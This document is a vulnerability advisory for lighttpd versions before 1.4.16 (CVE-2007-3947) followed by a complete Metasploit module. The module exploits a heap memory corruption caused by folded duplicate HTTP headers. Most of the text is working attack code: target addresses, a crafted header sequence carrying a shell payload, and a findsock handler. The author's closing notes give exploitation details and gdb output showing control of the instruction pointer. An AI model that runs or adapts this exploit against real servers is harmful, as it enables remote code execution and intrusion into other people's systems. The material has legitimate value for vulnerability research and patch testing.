source: https://www.securityfocus.com/bid/24967/info
Lighttpd is prone to multiple remote denial-of-service vulnerabilities, a code-execution vulnerability, and an information-disclosure vulnerability.
An attacker can exploit these issues to execute arbitrary code, access sensitive information, or crash the affected application, denying service to legitimate users.
These issues affect versions prior to lighttpd 1.4.16.
require 'msf/core'
module Msf
class Exploits::Linux::Http::Lighttpd_Header_Folding < Msf::Exploit::Remote
include Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Lighttpd <= 1.4.15 Heap Memory Corruption',
'Description' => %q{
This module exploits a heap based memory corruption in Lighttpd <= 1.4.15.
This vulnerability is caused due to danling pointer dereference while handling
folded http headers.
},
'Author' => [ 'Abhisek Datta [abhisek.datta<at>gmail.com]' ],
'License' => BSD_LICENSE, # BeerWare too!
'Version' => '',
'References' =>
[
['CVE', '2007-3947'],
['BID', '24967'],
['URL', 'http://www.lighttpd.net/assets/2007/7/24/lighttpd_sa2007_03.txt'],
],
'Privileged' => false,
'Payload' =>
{
'Space' => 200,
'BadChars' => "\x00\x0a\x0d\x80\xff",
'MinNops' => 64,
'Keys' => ['+findsock']
},
'Platform' => 'linux',
'Arch' => ARCH_X86,
'Targets' =>
#
# This is a race against malloc family of functions. JmpAddr is GOT.PLT entry for
# malloc() since it is first malloc family function called after heap corruption.
# In all recent implementations, malloc() will detect heap corruption and trigger
# abort() so we target malloc() GOT entry. This method is very unreliable, afterall
# a good exploit means ./pwn and should be target less
#
[
['Linux Gentoo/2.6/glibc-2.4/lighttpd-1.4.15', { 'JmpAddr' => 0x080731a0, 'Ret' => 0xffffe411 }], # unreliable
['Linux Fedora Core 5/lighttpd-1.4.15', {'JmpAddr' => 0x0806c790, 'Ret' => 0x41414141 }],
['Linux Fedora Core 5/lighttpd-1.4.15-1.fc5', {'JmpAddr' => 0x080711dc, 'Ret' => 0xa0b0c0d0 }],
['Linux Debug', { 'JmpAddr' => 0x41424344, 'Ret' => 0x41414141 }],
],
'DisclosureDate' => ''))
register_options( [ Opt::RPORT(3001) ], self.class )
end
def check
response = send_request_raw({'uri' => '/'}, 5)
if response.nil?
print_status("No response to request")
return Exploit::CheckCode::Safe
end
version = response['Server']
if version.to_s =~ /lighttpd\/([0-9]+).([0-9]+).([0-9]+)/
return Exploit::CheckCode::Appears if (($1.to_i == 1) and ($2.to_i == 4) and ($3.to_i <= 15))
end
return Exploit::CheckCode::Safe
end
def exploit
if target.name =~ /^Linux/
exploit_linux(target)
end
end
def exploit_linux(target)
print_status("Trying to exploit #{target.name} JmpAddr: 0x%x Ret: 0x%x" % [target['JmpAddr'], target['Ret']])
what = target.ret
where = target['JmpAddr'] - 3
jumper = Rex::Arch::X86.jmp_short(64)
off = 0x42424242 - 27
loc = where - off + 1 - 27
send_http("GET", "\x23BB#{jumper}AA.html") do # $esi points to our GET .. string
[
{'Host' => datastore['RHOST'] + ':' + datastore['RPORT'] },
{'User-Agent' => payload.encoded },
{'Dummy1' => rand_text_alphanumeric(100) },
{'Dummy2' => rand_text_alphanumeric(100) },
{'Dummy3' => rand_text_alphanumeric(100) },
{'User-Agent' => rand_text_alphanumeric(9) },
{' ' => rand_text_alphanumeric(13) + [loc].pack('V') + [off].pack('V') + rand_text_alphanumeric(4)},
{' ' => rand_text_alphanumeric(1) + [what].pack('V') + rand_text_alphanumeric(5)}
]
end
handler # findsock
end
def send_http(method, path, sock = nil, read_response = false)
client = connect
request = String.new
opts = yield
request << "#{method} #{path} HTTP/1.1\r\n"
opts.each {|h| request << "#{h.keys[0].to_s}#{h.keys[0].to_s.strip.empty? ? "" : ":"} #{h[h.keys[0]].to_s}\r\n"}
request << "\r\n\r\n"
print_status("Sending #{request.length} bytes of data")
client.send_request(request)
if read_response
res = client.read_response(5)
print_status("Read #{res.to_s.length} bytes of data")
return res
end
end
end
end
=begin
Vuln:
* lighttpd maintains an array (struct array) to store http headers as key value pairs
* in case of a duplicate header entry, the source data string (struct data_string *ds) is
free'd
* If there is folding in the duplicate header field, value of the entry is copied to the free'd
memory (dangling pointer dereference)
* If realloc is triggered during copy (buffer_prepare_append) or later, heap corruption is detected
by libc memory allocator and abort() is triggered
Problem:
* *BSD/phkmalloc: struct pgfree/pginfo needs to be targeted
* Linux/ptmalloc2 detects memory corruption through the sanity checks
* Upto 63 bytes of data can be copied to dangling area in heap, if more, realloc is triggered which
detects heap corruption and abort()s
VooDoo:
* Exploitable in linux because of nice _small_ chunk handlings :)
* ds->value -> X
* ds->value->ptr -> X - y
* Exploitable because lighttpd abstract data type structures on heap and its handling
* Linux/2.6 trick *
* On sending duplicate http header, http_request_parse() calls array_insert_unique
which finds the previous entry of the duplicate key in hash and appends the value
and deletes the duplicate instance (struct data_string *ds) (data_string.c)
* In case of a folding in the duplicate header entry, ds remains dangling pointer on
heap which was free'd previously and the folded line is copied to ds->value->ptr thus
allowing us to overwrite ds->value pointer due to special characteristics of DL/malloc
8/16/32 byte chunk handlings
* At the next line folding, our data is copied to ds->value->ptr (dangling ref) again but
now we control ds->value and hence we have a arbitrary memory overwrite
---
(gdb) r -D -f ./lighttpd.conf
Starting program: /opt/lighthttpd/sbin/lighttpd -D -f ./lighttpd.conf
Failed to read a valid object file image from memory.
Program received signal SIGSEGV, Segmentation fault.
0x41424344 in ?? ()
(gdb) i r $eip
eip 0x41424344 0x41424344
(gdb)
---
* Can be Reliable?? *
Pass1: Dig the heap and fill it up with our data
Pass2: Copy our data on dangling ptr (ds is free'd by array_insert_unique in case of duplicate key)
*make sure realloc is not triggered in buffer_prepare_append*
Pass3: Dummy connect to allocate new data_string on heap with function pointers
Pass4: Attempt to copy *BIG* data on dangling ptr (need realloc corruption bypass) and overwrite function
pointers
close connection
*triggered pwn*
- Abhisek Datta (24/08/2007) abhisek[dot]datta[at]gmail[dot]com
"In God we trust, everything else we virus scan"
- Chintan
=end